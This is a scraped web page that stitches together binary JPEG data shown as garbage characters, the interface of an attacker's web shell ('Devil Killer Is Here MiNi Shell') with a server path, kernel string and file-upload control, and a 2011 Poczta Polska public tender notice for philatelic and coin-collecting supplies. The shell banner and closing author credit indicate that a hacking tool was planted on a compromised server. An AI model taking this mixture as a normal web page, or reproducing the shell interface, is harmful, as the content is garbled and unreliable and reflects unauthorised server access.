JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110516/138851-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa towarów i akcesoriów filatelistycznych</b><br>
<b>Numer ogłoszenia: 138851 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. ul. Rakowiecka 26, 00-940 Warszawa, adres do korespondencji: Poczta Polska S.A., Centrum Infrastruktury, ul. Świętokrzyska 31/33, 00-941 Warszawa , ul. Świętokrzyska 31/33, 00-941 Warszawa, woj. mazowieckie, tel. 022 5053538, faks 022 5053480.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa towarów i akcesoriów filatelistycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa  do jednostki organizacyjnej Poczta Polska S.A. Centrum Poczty, Dział Obsługi Filatelistycznej ul. Zygmunta Augusta 3a, 85-082 Bydgoszcz, niżej wymienionego  asortymentu: 
Część 1 -  Klasery jubileuszowe
Część 2 - Okładki i karty klaserowe 
Część 3 - Akcesoria filatelistyczne
Część 4 - Towary numizmatyczne i filatelistyczne
Część 5 - Koperty do pakietów niebieskie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.84.00.00-0, 30.19.90.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 105.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości:
1. dla części I - 1.000 zł (jeden tysiąc złotych),
2. dla części II - 240 zł (dwieście czterdzieści złotych),
3. dla części III - 350 zł (trzysta pięćdziesiąt złotych)
4. dla części IV - 4800 zł (cztery tysiące osiemset złotych),
5. dla części V - 150 zł (sto pięćdziesiąt złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S.A. Centrala Centrum Infrastruktury, ul. Świętokrzyska 31/33 00-940 Warszawa Vp. pok. 522.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2011 godzina 12:00, miejsce: Poczta Polska S.A. Centrala Centrum Infrastruktury, ul. Świętokrzyska 31/33 00-940 Warszawa IV p. pok. 447 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Klasery jubileuszowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa  do jednostki organizacyjnej Poczta Polska S.A. Centrum Poczty, Dział Obsługi Filatelistycznej ul. Zygmunta Augusta 3a, 85-082 Bydgoszcz, klaserów jubileuszowych w następujących ilościach: 
1. Klaser Jubileuszowy Generalna Gubernia lata 1939-1944 40 szt.,
2. Klaser Jubileuszowy PMW lata 1860-1945 30 szt.,
3. Klaser Jubileuszowy Tom I lata 1944-50 50 szt.,
4. Klaser Jubileuszowy Tom II lata 1951-55 30 szt.,
5. Klaser Jubileuszowy Tom III lata 1956-59 30 szt.,
6. Klaser Jubileuszowy Tom IV lata 1960-61 70 szt.,
7. Klaser Jubileuszowy Tom V lata 1962-63 50 szt.,
8. Klaser Jubileuszowy Tom VI lata 1964-65 30 szt.,
9. Klaser Jubileuszowy Tom VII lata 1966-67 30 szt.,
10. Klaser Jubileuszowy Tom VIII lata 1968-6940 szt.,
11. Klaser Jubileuszowy Tom IX lata 1970-71 30 szt.,
12. Klaser Jubileuszowy Tom XI lata 1974-75 20 szt.,
13. Klaser Jubileuszowy Tom XII lata 1976-77 30 szt.,
14. Klaser Jubileuszowy Tom XIII lata 1978-79 30 szt.,
15. Klaser Jubileuszowy Tom XIV lata 1980-81 40 szt.,
16. Klaser Jubileuszowy Tom XV lata 1982-84 60 szt.,
17. Klaser Jubileuszowy Tom XVI lata 1985-87 60 szt.,
18. Klaser Jubileuszowy Tom XVII lata 1988-89 40 szt.,
19. Klaser Jubileuszowy Tom XVIII lata 1990-91	70 szt.,
20. Klaser Jubileuszowy Tom XIX lata 1992-93 70 szt.,
21. Klaser Jubileuszowy Tom XX lata 1994-95 30 szt.,
22. Klaser Jubileuszowy Tom XXI lata 1996-97 50 szt.,
23. Klaser Jubileuszowy Tom XXII lata 1998-99	70 szt.,
24. Klaser Jubileuszowy Tom XXIII lata 2000-01	30 szt.,
25. Klaser Jubileuszowy Tom XXVII lata 2008-2009 100 szt.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.84.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Okładki i karty klaserowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa  do jednostki organizacyjnej Poczta Polska S.A. Centrum Poczty, Dział Obsługi Filatelistycznej ul. Zygmunta Augusta 3a, 85-082 Bydgoszcz, okładek i kart klaserowych w następujących ilościach: 
1. Okładka do albumu DAVO (oznaczona numerem I) 5 szt.,
2. Okładka do albumu DAVO (oznaczona numerem III) 5 szt.,
3. Okładka do albumu DAVO (oznaczona numerem IV) 5 szt.,
4. Okładka do albumu DAVO (oznaczona numerem V) 5 szt.,
5. Okładka do albumu DAVO (oznaczona numerem VI) 5 szt.,
6. Okładka do albumu DAVO (oznaczona numerem VII) 4 szt.,
7. Okładka do albumu DAVO (oznaczona numerem VIII) 5 szt.,
8. Okładka do albumu DAVO (oznaczona numerem IX) 5 szt.,
9. Okładka do albumu DAVO (oznaczona numerem X) 5 szt., 
10. Okładka do albumu DAVO (oznaczona numerem XI) 5 szt., 
11. Karty do klasera DAVO - rok 2004	6 szt.,
12. Karty do klasera DAVO - rok 2006	6 szt.,
13. Karty do klasera DAVO - rok 2007	10 szt., 
14. Karty do klasera DAVO - rok 2008	5 szt., 
15. Karty do klasera DAVO - rok 2009	15 szt., 
16. Karty do klasera DAVO - rok 2010	15 szt.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.84.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Akcesoria filatelistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa  do jednostki organizacyjnej Poczta Polska S.A. Centrum Poczty, Dział Obsługi Filatelistycznej ul. Zygmunta Augusta 3a, 85-082 Bydgoszcz, niżej akcesoriów filatelistycznych w następujących ilościach:
1. Lupa (3 x); składana prostokątna 100 szt.,
2. Lupa (3 x); składana okrągła 100 szt.,
3. Lupa (5 x); składana 100 szt.,
4. Lupa podświetlana (3 x) 100 szt.,
5. Lupa podświetlana (5 x) 50 szt.,
6. Lupa z uchwytem (4 x) 50 szt.,
7. Lupa z uchwytem (5 x) 50 szt.,
8. Pincety do znaczków PI 12 150 szt.,
9. Pincety do znaczków PI 22 150 szt.,
10. Pincety do znaczków PI 62 De Luxe 60 szt.,
11. Gilotynka do hawidów (do 98 mm szerokości) 40 szt.,
12. Ząbkomierz (150 x 80 mm) 20 szt.,
13. Hawidy - do całostek 300 szt.,
14. Hawidy 217x30	500 szt.,
15. Hawidy 217x35 (całkowicie przeźroczyste) 500 szt.,
16. Hawidy 217x40 (całkowicie przeźroczyste) 1000 szt.,
17. Hawidy 217x46 (całkowicie przeźroczyste) 1500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.84.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Towary numizmatyczne i filatelistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa  do jednostki organizacyjnej Poczta Polska S.A. Centrum Poczty, Dział Obsługi Filatelistycznej ul. Zygmunta Augusta 3a, 85-082 Bydgoszcz, Towary numizmatycznych i filatelistycznych  w następujących ilościach:
1.Karty do monet M 15 Optima (opakowanie 5 szt.) 100 op.,
2.Karty do monet M 24 Optima (opakowanie 5 szt.) 100 op.,
3. Karty do monet M 35 Optima (opakowanie 5 szt.) 100 op.,
4. Karty do monet M 54 Optima (opakowanie 5 szt.) 100 op.,
5. Karty do monet M 6 Optima (opakowanie 5 szt.) 100 op.,
6. Karty do monet M 40 Optima (opakowanie 5 szt.) 100 op.,
7. Karty do monet M 12K (opakowanie 5 szt.) 100 op.,
8. Karty do monet ZWL 100 szt.,
9. Klaser rocznikowy do monet 1916-1944 20 szt.,
10. Klaser rocznikowy do monet 1949-1972 20 szt.,
11. Klaser rocznikowy do monet 1973-1986 20 szt.,
12. Klaser rocznikowy do monet 1987-1990 20 szt.,
13. Klaser rocznikowy do monet 1990-1995 20 szt.,
14. Klaser rocznikowy do monet 1996-2000 20 szt.,
15. Klaser rocznikowy do monet 2001-2004 20 szt.,
16. Klaser rocznikowy do monet 2005-2007 20 szt.,
17. Album do monet 2 zł GN 2009 20 szt.,
18. Poczet Królów Polskich na monetach 2 zł GN	20 szt.,
19. Klaser do kopert FDC CLASSIC 300 szt.,
20. Klaser do całostek CP CLASSIC 150 szt.,
21. Klaser A4 (8-kartkowy) 300 szt.,
22. Klaser A4 (12-kartkowy z futerałem) 500 szt.,
23. Klaser A4 (16-kartkowy z futerałem) 300 szt.,
24. Klaser A4 (24-kartkowy z futerałem, na gąbce) 500 szt.,
25. Klaser A4 (32-kartkowy z futerałem, na gąbce) 500 szt.,
26. Klaser B5 (8-kartkowy z futerałem) 200 szt.,
27. Karta klaserowa A4 2-stronna 1000 szt.,
28. Karty Optima 1C (przeźroczysta) - op. 10 szt. 200 op.,
29. Karty Optima 1S (czarna) - op. 10 szt. 200 op.,
30. Karty Optima 2C (przeźroczysta) - op. 10 szt. 300 op.,
31. Karty Optima 2S 300 op.,
32. Karty Optima 3C (przeźroczysta) - op. 10 szt. 300 op.,
33. Karty Optima 5S (czarna) - op. 10 szt. 100 op.,
34. Karty Optima 5C (przeźroczysta) - op. 10 szt. 100 op.,
35. Karty Optima 6S (czarna) - op. 10 szt. 100 op.,
36. Karty Optima 7S (czarna) - op. 10 szt. 100 op.,
37. Karty Optima 2VS (czarna) - op. 10 szt. 100 op.,
38. Karty Optima 3VC (przeźroczysta) - op. 10 szt. 100 op.,
39. Album BOGA 1  - klasery do arkuszy 50 szt.,
40. Album BOGA 4 - klasery do arkuszy 50 szt.,
41. Karta klaserowa B5 2-stronna 1000 szt.,
42. Klaser A4 (16-kartkowy z futerałem) 400 szt.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.84.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Koperty do pakietów niebieskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Umowy jest dostawa  do jednostki organizacyjnej Poczta Polska S.A. Centrum Poczty, Dział Obsługi Filatelistycznej ul. Zygmunta Augusta 3a, 85-082 Bydgoszcz, kopert do pakietów niebieskich w następujących ilościach: 
Koperty do pakietów niebieskie - 10 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.90.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com